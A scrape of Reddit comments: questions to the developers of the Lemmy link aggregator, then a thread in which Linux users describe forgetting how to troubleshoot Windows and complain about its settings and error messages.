I can see the appeal of having a OSS social media platform(I do enjoy peertube), but seeing how most people don't care about internet privacy or OSS, will people, other than Linx users and programers, be willing to add Lemmy to the ever growing list of social media accounts?
Does it come with Jack&coke or do I have to bring my own?
I would change the default theme. The vast majority of people do not like using black applications. They are depressing to look at (dark and moody), and do not have enough color to provide a proper UI. 

Also, please look into a proper moderation system. The simple "up/down" from reddit is pathetic, abused beyond words, and actively cultivates circlejerking and brigading.

Best to not even show the current score; nobody needs to know the score in order to have a proper discussion. Look at the comment, read it, and form your own opinion without knowing what everybody else thinks of it. Looking at the score of a post actively determines how most people will view it.

I've really liked slashdot style moderation, you should check out how that works. But they still show the score, and they shouldn't. Just use the score internally and never display it publicly. My opinion.
[deleted]
Why is it built in rust?
[deleted]
Is it built from the Reddit source code or did you code it yourselves?
There is no more free speech on Reddit. Will Lemmy be better? Also, can you implement a system whereby moderators can receive donations for their hard work?
I do love the idea of an alternative of reddit and open source since reddit was bought by a chinese company. I am scared of censorship and news manipulation by the chinese government.
I tried to register/sign up but a red window at the bottom of the page said registration closed.
This seems really interesting, i have a couple of features on reddit and [RES](https://redditenhancementsuite.com/) that i like and i think lemmy misses, Can you comment on if these exist or if you plan to implement them?

* keeping a score of how much upvotes minus downvotes each user got (e.g. if i upvote a user 20 times and downvote him 5 times the number 15 will appear next to the name).

* tagging a name (I can get some string to appear next to the username of a user e.g. "Lemmy developer" can appear next to parentis_shotgun)

* hiding comments i already read (on RES doing "f !re" deletes any comment i clicked on)

* multireddits

also some sort of a ability to customize the sorting of comments could be useful, as reddit or certain subreddits can have a particular opinion about something, upvote all the comments that support that opinion and downvote all comments that oppose that opinion (which makes people not read the people that go against the certain "loved" opinion, creating a even stronger "hivemind" in the community and acting as some sort of [filter bubble](https://en.wikipedia.org/wiki/Filter_bubble)) , providing sorting rules so that for example certain usernames, or usernames that belong to certain catagories, or users with a high total of upvotes/downvotes you have given to a user will show on top.
Nice project. Good luck with it!!   


Is this named after who I think?
I actually want to start using this, how does the karma system work And for normal users which versions do you recommend? I saw you listed 3 domains
This is awesome! When is the full release coming out? And when it does will I be able to keep my accounts/communities that have been created?
I have a server rack in my basement, a 1GbE duplex connection to the Internet, and a desire to help. Anything I can do?

The one thing I’m short on right now is RAM...
* Favorite food/best beverage?
* Music & pony preferences?
Maybe you want to try to get the Raddi developer on board: /r/Raddi
Are communities contained within an instance or do they span them? I'd imagine I want to browse posts in all federated servers that are in Linux communities. Would I need to subscribe to each individually? Naturally I might want to exclude the ones made on [troll.social](https://troll.social) so that would be needed to. Am I making any sense?
Very important question, especially now: will federation include tools to moderate hate speech or will this be entirely up to the admins? History tells us the lack of these features end up creating toxic spaces such as Gab and Voat.
The problem is that after you build it and no one uses it, we just have another dead project on our hands and we all know why.

People use Twitter, Reddit, Facebook, etc., because other people use it.  I keep signing up for these alternative privacy focused or decentralized sites and they are all garbage because no one uses them, or the people that use it are not people you want to deal with.
How do you feel about thedonald.win?
Well on done on Lemmy but I wont be using it.

Its interface isn't compact enough. I'm an avid RES user so that should give you an idea of what I was hoping to see.
What is a link or content "aggregator" I've seen many Reddit clones (alternatives) which describe themselves in this way.
A socialist reddit? I'm serious....
> written in rust w/ actix + diesel, and typescript w/ inferno.

cute
The dev Team seems to like suppressing ideas they don’t agree with. Can’t see myself using this software, even though I’m not even right wing.
Are you going to assign copyright over to the FSF or some similar organization that is *not* connected to your personas? 

No? Then why should we even think that you have no other motives?
> We feel that all software should be communally developed, and benefit humanity, not a small number of company owners. As such we will never have ads, or any privacy-offending technology.

Look! An empty promise! If it's not an empty promise, how were you planning on convincing people otherwise?
This is a bit of a fluff post, but I thought it'd be fun to discuss. Like most Linux users, I'm an ex-Windows user. Now when it came to windows, I considered myself rather adept at troubleshooting and solving windows problems. I was that guy in your family or friends group that was the default "IT guy" - no matter what problem you were having. Most of the time I was able to solve things, navigate around comfortably, try troubleshoot steps, the whole lot. *However...* Since I migrated over to Linux (full-time) about a year ago, I've noticed that a lot of the muscle memory and general knowledge about windows has just sort of... faded away.

I'm still the "IT guy" in my social circle, most of whom use windows, so I often get questions about how to do X or solve Y in windows 10/11. Up until a few months ago I was still pretty good at it, even without access to a machine running windows. Nowadays however, it's a completely different story. If it's not something *rather* obvious or easy to fix, I tend to struggle. A lot of it can be chalked up to "wait, does windows allow you to do that?" among desperate calls for a real terminal emulator with gnu coreutils.

When a friend has an issue on windows, my mind defaults to "okay, open terminal, do XYZ, test, repeat, etc etc" but then I realise I can't just tell my friends to type some terminal commands to solve their problem. Its really opened my eyes to the freedom Linux gives the user, both in terms of general computing & more advanced config. I know this post is just fluff, but I thought it was interesting. Especially as someone who had basically been using windows their whole life. **A lot** of that knowledge is just... gone.

I've taken to telling my windows friends "I don't know how to troubleshoot your OS" and it does the trick, ha.
In your defense, in the past year, Microsoft has put a shitload of effort into hiding system settings and options in favor of their shitty settings menu
Interesting. I used to use Windows quite extensively, but my last personal use was Windows 7,and I've forgotten most of that. 

At my last job, my boss (a W10 person) called me into his office and said he had an 18-page pdf that he wanted to break up into 18 one-page pdf files.

My first thought was "pdftk file.pdf burst". Easy enough.

But I had no idea how to do that on Windows. I googled, and eventually found a website that would do it for him.

So when people ask me "how do you do *X* on Windows?" I usually say that I have to Google it.
since migrating i have realized that i never knew as much about windows as i had thought..... don't get me wrong, i still know more than most of my afk contacts about fixing windows, but there are sysAdmin functions which i know exist because of linux which i also am now aware exist and work in windows however i have no knowledge of how to access them, and little desire to figure it out since many are simple enough to fix with a clean install....  
  
i realized the other rabbit hole was deeper than i thought but i know the one i am now in is deeper yet
I feel you. I've been a windows user from 98 to XP SP3 and I've used to be able to troubleshoot most things easily... But now I'm too used to Linux's helpful error messages and logs and available drivers/programs. Heck, the only thing I can say now is "check in the control panel" or "google it".
Yeah, I feel ya. It's hard because troubleshooting Linux stuff teaches you to do smart, logical things. I still troubleshoot Windows stuff as my day job and most of the shit I do just doesn't make any fucking sense. Oh your software you just installed isn't working? Remove it and install it again! Why did that work? Who the fuck knows! Doing repeated actions and expecting a different outcome is the definition of insanity, on Windows it's normal.
I still can do basic stuff. Some things never changed for years and are still the same. But last windows I really power-used was Windows 7.

I mean I use a win 10 laptop from work. But all I do is Outlook, Firefox and Office. Everything is dictated by IT (asshats won't even let me switch FN and CTRL keys, that lenovo apparently placed just wrong...)

A few weeks back colleagues asked me to use their SharePoint. I had a hard time figuring out how to get that thing into windows ~~adplorer~~ explorer.

I hate it when my MIL has problems with her win 8.x laptop. But i'm to lazy to update and explain her windows 10 (probably that thing wouldn't even run windows 10)... I hope the HW dies soon and we'll buy her a new laptop.... Which still will be windows
What I think you are finding out is that Windows isn't actually intuitive. It just happens to be what people gain a lot of experience using over the course of their lives.
Fixing Windows issues always felt like doing random unrelated stuff which surprisingly solves the issue. Rather than really knowing what's off.

In that regard, since Windows troubleshooting is still trial and error, I don't think there is much so "forget" about.

Even tho I feel like this about myself and my Windows knowledge I end up still knowing more stuff about Windows than people who use it daily.

Which is odd as I stopped using Windows on all of my personal devices over 4 years ago, not even dual booting any longer and I am entirely out of the fix random issues loop.

Also Windows hasn't evolved much in the past 16 years if you ask me.

I like Linux for it's simplicity, ease of use and that it actually tells you what is wrong rather than throwing random "Error at 0x000ffe" and you start goggling until you narrowed down the root cause to then do finally start to fix things.

I mean not even the Windows error logs are more precise than those ridiculous popups ...

Run an app from CLI or just ask journalctl or dmesg and boom, there you have it, know what is off and just can start fixing.

Rather than poking around for 5h in the dark ...

I feel very sorry for all those Windows admins and Helpdesk guys out there. Must be a very unsatisfying job.
Oh My God, I relate to this, entirely.
Windows fixes were always so primitive, it was almost always about doing something in the control panel or having to fiddle with that abhorrent registry. Maybe downloading a third party app for a certain thing. So yeah, I've forgotten how to Windows myself as well. Good thing that I managed to switch other 7 close people to various Linux distros already so I don't have to deal with Windows anymore. At work it's still Windows but I don't have to touch the OS itself fortunately.
[deleted]
The same has happened to me and it's great! It's probably taken about a decade of being away from Windows until I can finally honestly answer "I have no idea" and mostly go on my way. Finally I'm no longer the free Windows IT guy.
Gosh, yes.  I did my original certs on Windows NT 3.5 - a long time ago.  I was a mainframe and Unix guy before that.  Worked mostly on Unix and then Linux over the years and while I still have windows servers - if I'm going to do something, I'm usually doing it on Linux or Mac. 

I can write basic powershell scripts to configure systems but I find the architecture, which hasn't changed in 30 years, to be frustrating and unnecessarily cumbersome.   At times, Windows (to me) verges on a Doctor Evil plot: ridiculously complicated, unclear outcomes and mostly for a good laugh.
I had that problem when I moved to Linux during the Vista era. 

Funny flip side to the coin though...

When I moved back to using Windows after Win7 came out, I was now comfortable with a CLI and very quickly learned to use PowerShell to solve tons of issues and complaints.

Using Linux made me a much better Windows administrator.
[deleted]
I think that the quality of Microsoft documentation has fallen off a cliff.  

SharePoint, for example, is barely documented outside of the MSDN network, and the stuff you find there isn't version-specific, so it's a bit of a moving target whether the article will apply to your product.
Yep, absolutely. Linux makes things so damn easy any time I end up trying to fix a windows issue it's like pulling teeth and the entire time I'm complaining about how everything is 10-20x harder in windows than it needs to be. I exclusively use windows for games since XP so oftentimes when someone asks me a windows-specific question all I can do is shrug and tell them "you're on your own, good luck".
Fixing things on Windows makes me say a lot of different phrases. "This is dumb", "of course, have to reboot", "why do things break on Windows all the time", "where did they move ____ to now?", "Windows feels ancient no wonder Apple is getting more popular ", "this feels like a downgrade", "why is this crap still #1", I could go on and on
I keep typing "ls" into windows command line
The problem with windows is the really unhelpful error messages, like if something goes wrong you never know why, you just keep guessing until something works out. On Linux however you have access to dmesg, journalctl, man pages, the ability run a program with a -v or debug flag that gives you even more information as what exactly failed. We also have really good community support and wiki pages (shout out to the arch wiki) and well documented bug reports.
[deleted]
I switched from Win98. Windows techies can run circles around me, but I'm still (unfortunately) a better troubleshooter than non-techies.
I'm the same way. I don't use windows at work since 2012 (winXP). I've used arch/manj from 2017 for a desktop only booting to win10 once every 2-4 weeks to play SC2.

My decline of Windows knowledge is compounded by the fact Windows keeps changing and moving things around in their UI transitioning from XP, 7, 10. To where I don't even know how to do basic stuff anymore. 

I cannot stand updating software even on linux, cuz if it works then I'm not "changing" it to be 0.001% better. If I use a CLI app, test it 754 times, then upgrade and some `--flag` behaves *slightly* different I'm furious.
Its not necessarily your fault. Windows is moving to a very heavy ***subscription 4 everything*** model. Its making some professional level knowledge costly to gain and risky to guess. What hasn't been made subscription based has changed due to cloud, AI, and complete UI makeover since Win7. AD on premise or Auzura or both? Office365/Shairpoint/Teams?
Can you sync with this server? How many subscriptions do you need? Is office cloud actually beneficial to your company or is it too costly and limiting than rolling your own solution?

The only thing I find hasn't changed much is printers. They are still the same PITA as they were 10-20yrs ago. Last year the office got BSODs due to a windows update that broke several professional printer drivers (Kyocera for us)... twice (second time rollback wasn't available and patch fixed bsod, but borked printing. After hours of troubleshooting and calling printer people over we learned the PDL had to be changed on every machine after the update).

But windows is a PITA anyways. Docs/forums for any problem I would actually have to look up prety much say the same thing
1) Reboot
2) sfc and dism
3) Refresh/Reinstall
4) Wipe and Reinstall

There is 0 attempts to ever understand what caused the error and actually fix it. Just restart/reinstall, change nothing, and wait for it to inevitably happen again.
Yes. Between Windows 3.1 and Windows XP, I knew Windows like the back of my hand. When Windows 10 came out, I was still familiar, but they had simplified so many things I got out of practice. Then when I made the switch to Linux (while dual booting Windows), I've realized that I've forgotten even more. Now when I have to work on Windows (11 this time), I find that some of the things I used to do don't work anymore, and that problem resolution has truly defaulted to "install this and click this in the control panel."

I'm glad I got away from relying upon Windows.
I know the general feeling but I think this is honestly a windows problem. Because it's not only about missing the experience to solve a problem because back then you had to fix such things yourself but more a matter of Windows actually getting worse in that regard.

If 5 years ago I knew how to spot a problem and fix it this method would stay valid. But nowadays I can basically google a problem, find 4 different solutions and have to try which one is currently working because this constantly changes. A thing fixed by changing registry key X a few months ago might require some completely different solution a month later only to suddenly work next week.

In the end it often feels like I never actually fixed things in Windows but often just knew work-arounds. And the life time of such work-arounds seems to decrease with each new version or patch.
Yes, and I'm proud of it.

Actually I almost walked into a career of supporting Windows computers, I'm glad I didn't. I fundamentally don't believe that technology should be weaponized against end users, which is the endgame with all proprietary software. Don't get me wrong Windows wasn't nearly as bad when I left, you didn't have to opt out of 500 pages of invasive settings or anything, but I knew that a storm was on the horizon, since Vista at least.

Sometimes people still say that I should fix their computers. It's hard to explain to them that I am as interested in dealing with Windows as a Jehovah's Witness would be in helping you hang your Christmas lights.
Tbh I do not feel like I have lost my touch with Windows at all - I just hate it more now. With Linux I can go in with surgical precision if I need, with Windows you just can't. There's no patching or talking to the devs on resolving your issues or bugs.

I even find myself dealing with so called Windows IT admins from time to time & trying to help their lazy butts along with properly troubleshooting or resolving their own issues - especially bad with those Windows admins that can't be bothered to learn Linux. This isn't the 90's or early 2000's. There's little excuse to not learn it at this point imho, practically every company has Linux servers now, so you better learn it and if not I would likely never hire a Windows admin that expressed disgust or disdain for Linux. It's just part of IT work & if you hate Linux then I will assume you also hate learning anything new & will be easily stressed out by anything you are the least bit unfamiliar with and that is not good for an IT guy.  


Edit: To give some more background I also worked at a mom & pop computer repair shop for a year or 2 and I took a very deep dive into the inner workings of Windows. I rarely if ever settled for not knowing how anything worked or how something got infected exactly.. I basically got paid not to just do basic computer cleanup but to learn how to do detailed forensic level analysis even though that is not what they had really hired me to do..  


They would have much rather I just do the basic cleanups and send the PCs back out the door, but I maximized my time as much as I could. I would run various apps, searches, browse through the event viewer log and pinpoint the exact moment at which an infection occurred and then work forwards from there ensuring that I removed every little bit of an infection, some times faster and quicker than the actual scan tools I was running as well. I became very proficient at it to say the least and the more I did it the faster I could do forensic level analysis as well. A senior IT repair guy who had complained about how long I would take fixing computers stopped complaining once I started to exceed his own repair times & the rate at which I had to just wipe out a computer and start fresh completed plummeted compared to his own & the PCs I sent out the door had a habit of not coming back or having complaints from customers because someone reloaded their OS.  


The IT business imo is not for the lazy or the faint of heart, not if you take it seriously and do it well. It does get easier though the longer you do it, like with most things.
It's all gone. Not only I forgot, but my pretty extensive knowledge was relevant to a version of Windows that belongs in a museum.

It's a bit maddening. I sunk a lot of hours trying to figure out Windows by poking it this way and that. If I had switched earlier, there would be less waste in my life.

That's what I tell the kids these days. "You will switch eventually. The more you wait, the more useless knowledge you accumulate."

My colleague, who's 10 years younger, is a Linux native, and I envy that. I wonder if she wonders about all the glorious Windows things she's missing out on. Like Word, Photoshop or some video game.
Well, yes. But no regrets there. Luckily everywhere I am forced to have Windows we have trained IT professionals which I can bug all day.
It's pretty much gone.  Don't ask me anything after XP
Ihave forgotten everything I ever knew about Novell networking!
Not really, but I happen to be a Windows sysadmin for my day job. I use Linux at home mostly because familiarity with Windows has bred a lot of contempt.
tbh not really. It's kind of like riding a bike. It takes a few minutes to get used to window again, and it can be pretty frustrating, but it eventually all comes back

the big difference I did notice is how annoying it is to fix stuff. I had to fix the wifi drivers on my mom's laptop a few days ago, and only then did I realize how much I've gotten used to doing everything in the terminal lol

I also realized how little information windows gives you. I had network problems on Linux before and it would at least give me an error code I could look up. Windows just gives me "device has problems". And its never obvious why a solution works or what went wrong in the first place. One day it just stopped working and reinstalling the driver magically fixed it.
Last time my wife asked a question:

"Oh, it's somewhere in the control panel. Let me help you. Oh, where's the control panel on this version of Windows?"
**Linux forever, Windows never!** (again) I'm in a similar situation.  At one point I considered myself a Windows expert.  I haven't used Windows since I retired from a large corporation back in 2011.  I literally have PTSD from it.  I think we were putting Windows 7 on work computers back then.  I've been using Linux since then and have 0 regrets.  I tell my network that I no longer support Windows and offer free installation of Linux for anyone who wants it.  I spend my days doing what I want rather than waiting on virus and adware scans to complete.
I have experienced but honestly i mostly blame it on Windows for having absolutely useless error codes and zero documentation on any of them.

BSODs are a regular occurrence at my office and every single time i google the STOP code it leads me to an official microsoft windows forum where some Indian  contractor just tells you to run sfc /scannow or asks for logs and then provides a canned response to the log. If i have a problem in Linux i can almost always find intelligent responses and solutions but its like MS goes out of its way to make troubleshooting a huge waste of time.
A lot of the time troubleshooting Windows is just an exercise in cargo-cult actions because nobody really knows how anything works and even if other people are having the same problem, they're likely just reporting what random shit they've done that may or may not have fixed anything.

On Linux, at least if you file a good bug report to the right component, you have a good chance of getting to a developer who can actually do something with it. Bug reports for Windows seem to mostly go to the recycle bin..
Not necessarily Windows knowledge, but I find myself confused when I have to deal with Microsoft Office now that I have basically used LibreOffice for a year.
For me it's more like realising that Windows doesn't let you see its internals as easily as other Unix OSes do, and that you are pushed away from the curtain of obfuscation so that you never try to pull it off.

So most of the troubleshooting on Windows is quite unsophisticated and equivalent to using a hammer for every problem you encounter. Reinstall this, reboot that, rerun the updates and reset the settings to default.

We'll never know what triggered the error but we're sick of doing maintenance in a dark room, just throw everything out.
Happened to me. A friend asked me how to reroute some sound between two sound cards, and I was like "if I had PipeWire with EasyEffects..."
You lose knowledge if you don't keep using it. I feel the same.
I use my Linux os to excuse that I don't know how to fix Windows. Never had to do anything for the last 15 years!
Not sure I've lost windows knowledge since doing IT work a few years ago but I certainly haven't kept up at all with new releases.  What HAS really changed is my willingness to put up with how awful windows is to troubleshoot and if I can't solve something in 5mins I'm not wasting any more time on it.
I used to know where everything was in windows too before they started stripping everything out of the control panel.
Honestly with the newer windows, and better PowerShell I have had a resurgence of what I am able to do off the top of my head. I have spent most of my nearly 30 years in IT doing *NIX of some kind even though Windows got me through the door.  I have always been a programmer at heart, so if I can code it, it will get done. When all else fails, I just use Ansible and then we fall back into my core knowledge.
Yes, and I am better for it.
Definitely feel this. I've written enough bash scripts I probably look like a wizard. But put me behind cmd/powershell and I become a veritable chimp.
Yes, I have no clue where any of the windows settings are at. I know what I am looking for but no clue on what the names.
moved to Linux in 2005. Had an old computer before this, running Windows 95 still in 2004. Last Windows I kinda know was XP.
I used all windows from 3.11 to XP. This is where I decided to quit, more or less cold turkey and started distro hopping.

Nowadays I have no clue how to do almost anything in windows. I use Linux everywhere, including at work.
I mean, yeah, the last time I used Windows servers or anything was the late 90s.  I'm sure *something* has changed since then.  Right?
I totally concur.  I was always the go-to computer guy for my family and friends.  I quit Windows permanently for Linux when XP debuted back around 2002 or 2003 after hanging onto Windows 2000 for as long as possible.  While I keep up with Windows news via the several IT tech sites I keep up with and use Windows at work, I've totally lost touch with current versions of Windows and how to troubleshoot them.  But the upside is that I've also become an advocate for Linux and have convinced numerous people over the years to give it a shot.  My elderly father ran Linux Mint on his computer for several years before he passed away and loved it.  My sister also ran PCLinuxOS on her computer for several years until she bought a new machine that came with Windows.
I still work with a few Windows Servers at work and I build the SOE for our client devices, but I haven't used Windows on my home machine or workstation in about a decade. I've lost the muscle memory so if windows didn't have search functions I wouldn't be able to find anything, especially in the abomination of a settings app, thankfully most of control panel is still there if you look.

Sometimes it's easier just to do things in PowerShell
Some of my formal quals are in IT support. It was a Windows (only) support course at TAFE. 

I have had very little to do with Windows since except for helping my wife. Her corporate laptop is locked down and when I "got" admin permissions she got pissed with me for hacking her employers equipment. 

I help no-one else "Do I look like I give a shit?" should be on my tee shirt, 

or "Just turn it off and on again"

or "SNAFU"

or "it's in the cloud, above my pay grade"

or "the problem IS windows"

So I give her a little help when she can't do all those things she is meant to be able to do with her computer. Windows and Office are just so painful.
I remember how to install motherboard/GPU drivers, and nuking Windows with TronScript.

At work people ask me how to save images from email attachments and it took me an uncomfortable amount of time to find that option (I think it was Outlook).

My sister asks why MS Word documents lose their formatting when opened in libreoffice, and I don't know a solution (other than stop using Word of course).
Oh definitely, not using Windows as much has decreased my ability to tell users exactly where to find settings in Windows, I used to be able to do that blindly. Of course the fact that Windows 10 keeps changing with every release makes it even worse :p

&#x200B;

Using LibreOffice means that I don't know how to use ribboned MS Office either.
I can relate. My career is within the Windows/Microsoft universe, but I only use Linux exclusively on my personal equipment. 

I find myself getting annoyed at the day job, with how inelegant the MS products are sometimes.
Yes. I think (and this may sound funny coming from a Linux user) it's because Windows is so damn arbitrary about where and when I can configure certain things etc. The classic/modern identity crisis it's having doesn't help either - can I change this keyboard related setting in the classic Control Panel (which is greatly discouraged from Start menu results) or is it the modern Settings app? Don't get me started on how non-deterministic the Start menu search results are.

I told my parent and significant other if they wanted tech support they'd be using Linux rather than Windows, the thing is... I haven't needed to support them, it just works (for their use cases at least).
I don't do IT for Windows. If someone in my family wants to buy a Windows machine, all the power to them, but I'm not supporting that shit. I'll still do Mac and ChromeOS though. Those at least make sense to me, and I realize that Linux isn't for everyone. And if my grandmother installed Arch, I don't think that would make my life easier.
Not having to do random tech support was a hidden perk of moving to Linux. Now I just shrug and go I dunno, I don't use windows and their problems no longer become my problem.
I believe my Windows IT knowledge has somewhat diminished but I gained knowledge in general computer operation from installing Linux. I would say it's just give up something to learn something.

If you don't know how to troubleshoot, it's probably not your fault though. The further Windows updates, the fewer rights the user has. It is always changing until it reaches iOS level I guess.
I worked as a programmer / business analyst for many decades, so my Windows journey started at 3.1.  In the late 90's I started learning more and more about Linux, but since the day job required Window's, I only ran Linux servers.

Microsoft has been solely responsible for billions of dollars of lost productivity due to their software. If anyone can remember WordPerfect - you could write and format a document without ever taking your fingers off the keyboard. The first level of productivity erosion was the mouse.  From there, because their business software became so popular, we were stuck using it.  Does anyone remember Word upgrades that were incompatible with previous Word document formats?

Every time they released a new version of something, they added bloat and complexity. They hid more and more OS configuration behind obscure panels and made it more difficult for a knowledgeable technician to tune the OS.  Then we entered the web era where the focus was on making things "beautiful" and less concern with if the changes added any utility or impeded productivity.

My working career ended during the release of Windows 8 and I used that as my shield to stop people from asking me to help them.  Of course, friends had Windows 7 machines for many years, but if they were upgraded I said I couldn't help them. Why would you think a phone metaphor is useful on a desktop?

At that time I started venturing into the Linux desktop and started reducing the footprint of my Windows machines (usually converting them into a linux server). I have converted all but one Windows 7 machine I keep as a backup (just in case there is some software/function that I can't find in the linux world).  Haven't needed to go back to it very frequently...
I work in IT so I always have some exposure. Since shifting my career to be more network focused I've found diminishing on both Linux and windows 😂

But I still use Linux as my daily driver OS at home.
You don't need to leave Windows to experience that, just upgrade to Windows 11.
An advantage of being a Linux/Mac user is developing a "selective memory", and stopped being abused for free IT requests.   

You are doing something right, now you just need to learn the word "no". 

;-P
Not only has it diminished, but I find my self anxious and aggravated when using windows.  For context, I mostly stopped using windows after vista came out.  I switched my desktop and server to linux and changed jobs to use apple products, linux, and solaris.

My current gig is attempting to force me to use windows, I am constantly aggravated that things like CTRL-SHIFT-P don't work in the g'damn WSL terminal.
naa but I hate windows more and more all the time
I still have to do help desk shit so I still gotta deal with Windows and even Macs! Macs are the worst for enterprise.
I switched when Windows 95 and NT were current, so yeah you could say my Windows knowledge has gone down. 😉
It's stalled, but not diminished. 

Win10 and 11 is just confusing to use as a power user because it makes it so difficult to do tasks that should/could be very easy, however I also have a WinXP retro gaming PC so that helps keep it somewhat fresh.
What do you mean, no terminal? WSL!!!!!!

Also, ummm.... PowerShell. :-(
what Windows IT knowledge? xD
Yes! My Windows knowledge is stuck in Windows XP!
Yes, but who cares?

Long time ago I reached a point in life where I told everyone I was doing free IT maintenance for that for then on, they had two ways: my way (installing linux) or the highway.

Just my wife and my father chose Linux. Everyone else found another it guy, and I'm grateful for that.
Since I've moved to Linux I can't and will not help anyone with Windows problems. I have moved to Linux for a reason, I don't want to deal with the piece of dogshit Windows is any more.
The skills you've learned, and problems solved by "banging your head"  with Windows. How useless they "seem" to be with linux.
Windows has changed a great deal over the years. Switching everybody over to NT was especially huge. If you don't keep up, you're going to become increasingly out of touch.

The same is, of course, true of Linux. If you hadn't touched Linux since 1999, you wouldn't know that:

* The X server, if you even still use it, is an ordinary unprivileged program now.
* Graphics devices are detected and drivers loaded automatically. X server configuration files are mostly a thing of the past.
* `/dev` is automatically populated.
* The system log is a binary file that you need a special program to read. Said special program can query it like a database.
* Sound goes through a sound server so that multiple processes can play sound at the same time.
* Daemons are now managed by a supervisor process that can start/stop/restart them on command.
* Booting now involves unpacking a cpio archive as a temporary root file system which is responsible for finding and mounting the real root file system (which may be encrypted, span multiple disks, etc).
Its not so much that i forgot how to do things since i have to these things on a daily basis for work (i'm in IT support) but the sheer frustration of how some things work on windows is driving me up the wall. Installing and most importantly: Uninstalling software because it failed to install the first time is a royal pita because you can't just apt or pacman remove it, you have to click it, run through the uninstall wizard, then click the next one, run the uninstall wizard , click the next one and so on. Some programs like SQl server install around 15 different things so you waste tons of time uninstalling it if it fails installing the first time (and it fails A LOT). Printers are another major pain. Windows decides to update the drivers and poof, gone are all your settings. Installing a printer takes for-ever and ever and the windows print spooler is utter garbage with constant semi-crashes which causes certain printers to just stop printing for no obvious reason. 
Installing applications takes forever, hunting for drivers takes forever. Clicking through 50 popups to keep and run the file you downloaded, yes i really want to keep it, yes i know it can be insecure, yes i do actually want to run it and yes i give permission to install it. Windows is becoming more and more a nightmare to support. At least in the early days you knew what was wrong, some IRQ settings not correct or a driver needed an update but now you can put a perfectly working system at a customer and a week later windows has completely wrecked it by itself because it decided that thing you installed was a virus, that driver was out of date (but the only working driver) and ohyeah, some windows update ruined the rest. At least on linux its consistent, if you do X you break or fix Y. If an update A wrecks B, just revert update A and you're good to go. On windows its more like a casino and most of the time you don't even know what you did to fix it. Just repeat what you did untill it works, wasn't that the definition of insanity?
Yes, absolutely. Father in law often asks me about windows updates messing something up or other Windowsy shenanigans and it’s very difficult to relate let alone diagnose these days.

We tried (and failed) to diagnose some blue screen errors around a year ago and it really highlighted to me the strength of an open source community and the sheer wealth of knowledge available by searching forums when diagnosing issues like this for Linux. Trying to ask for support on a TechNet forum was a painful and slow experience that ultimately was not successful.
Honestly, windows just feels old fashioned to me.
What is this "Windows" you speak of?
Isn't Windows that shit show that I need to boot for maybe 10% of the games?
yep - was a windows systems engineer for ~10 years before moving to a "devops" consulting position. a few windows clients over the years, but thankfully not too many. the last windows servers i was fully responsible for were 2008r2 - having moved to linux at work and home, i have forgotten a lot of how windows works. i can barely remember powershell commands, let alone fsmo roles (are they still a thing?)
Oh gowd yes. Its been over 20 years since I used a Windows PC at home. So its not so much my knowledge has gone. But it is well out of date as the OS has changed so much. 

Bloody wonderful being able to answer friends and family with. 

"No f-ing idea. Haven't used that crap in ages. "
I was a wizard of DOS (started with 1.0 on the original IBM PC) and Windows 3.1 but 1994 was my year of Linux on the desktop and I never looked back.

I don't miss knowing those things.
Your post fits me as well, I'm a Linux user since last September and I only really still use Windows on my gaming computer and I must say, when I use Linux for all of my software development and actively use terminals to do more than half of my tasks in Linux it's just frustrating to do the same on my gaming desktop... Like take for example VSCode, it's even a Microsoft product and in Linux it's basicly like vim where I can open a file or directory by simply typing "code .", "code mydir" or "code myfile" and easily get to work!

But in Windows I can't do the same in cmd, the reason I have my personal files in private git repos is precisely so that I can access them anywhere locally easily but in Windows, not being able to simply type "git clone git@github.com:me/myrepo.git && code myrepo" is annoying to me
+1

10 years on help desk and then 11 in a nigh-exclusive Linux data center environment. I don’t “do Windows” anymore, as that muscle has atrophied.
Rebooting the PC doesn't work anymore? /S
Honestly yes, and it can be used to your advantage of your smart enough. I wouldn't say my knowledge *completely* is gone, it just taking 2 mins for what would take like 30 secs usually as an example.
I always use the "I can't help you cause I use linux" excuse as the place where I live, people have a bit (read: metric shit ton) of entitlement for any ounce of your skill.
Tldr-Yes, and use it as an excuse
I stumble around windows now and get frustrated. I think they have made the settings and general operations hard to use.

A fresh install feels like adware. I feel like I'm just using a big advertisement platform when I open the start menu.
> but then I realise I can't just tell my friends to type some terminal commands to solve their problem

It astonished me how easy it was to get my dad, whom I set up with an Elementary OS laptop, as he is a very settled Mac user, to press Ctrl + Alt + T and type `sudo systemctl start sshd` over the phone (the command I opted to send via SMS so he could just type it off). Explaining which GUI icons to click and which of dozens of options in some cascaded menus to choose would have been way more difficult.
This exact scenario is actually why I ended up not converting to Linux for my day to day use... My business is supporting residential and small business clients.. 95% of whom are windows user (4% Mac os and 1% android devices).

It just didn't make sense to risk compromising my windows knowledge that I need just so I could have a better environment for myself.
LOL - yes and this is by design.  I get requests from people using windows and I tell them - I haven't used windows in like 15 years.  Whenever I get forced into - usually by a family member I feel sorry for them putting up with all the crap they do.
  
The OS is painfully slow and nags them to buy shit all the time which is disgusting.  Before my stepdad died I switched him to linux because he clicked on everything - mostly porn related - and was constantly calling me "the FBI has locked out my computer" - same conversation over and over.
  
After I switched him to linux he raved about "how fast it was" but would occasionally call me with some issue about some file that wouldn't open.  I told him to "get over it" and eventually he did.
I kind of don't even want to think about the Windows way of doing things anymore.  Every time I'm forced to interact with it, it rapidly descends into frustration and expletives.
to me; software is software. there are changes and one just has to adapt to the changes.. of course, I learn very quickly. so, I have no problem jumping back and forth between OS's.
I don't know anything about PowerShell. Every time I attempt to use it, I get frustrated and give up. Every time I try to find tutorials, they just assume way too much or too little prior knowledge and I'm overwhelmed or bored.

So I just type `cmd`, do what I know, then leave.
I can relate to this very much.
Just last week my cousin asked my help to set Chrome as default browser on his Windows 11 OS.

I have never used win11.

 I have used MS-dos till like windows 10 or something. Been a Linux user since a few years.

So after some research, it seemed that setting default programs for different file extensions and stuff in windows 11 is a really tidious task.

I ended up telling him "who cares about Chrome, just use another browser".
I mean yes and no?

I've been a Windows user since 3.1. I didn't start becoming a power user until digging into NT, then finally a sys admin with 2000.

I'm still up to date and comfortable in and around Windows. Why? It's *familiar*.

Linux? Linux is drugs. Linux is "Hey okay, you may not get this, but there's all kinds of documentation out there for you to learn with, so figure it out".

For the first two years? Yeah. Linux made me feel like a dabbler. Like I was a do nothing schmuck. But, that's changed. I still don't dig into it nearly AS deeply as I have with Windows (since most of my clients these days are running Windows), but on the back end? For the technical support and open source software options? I love it.

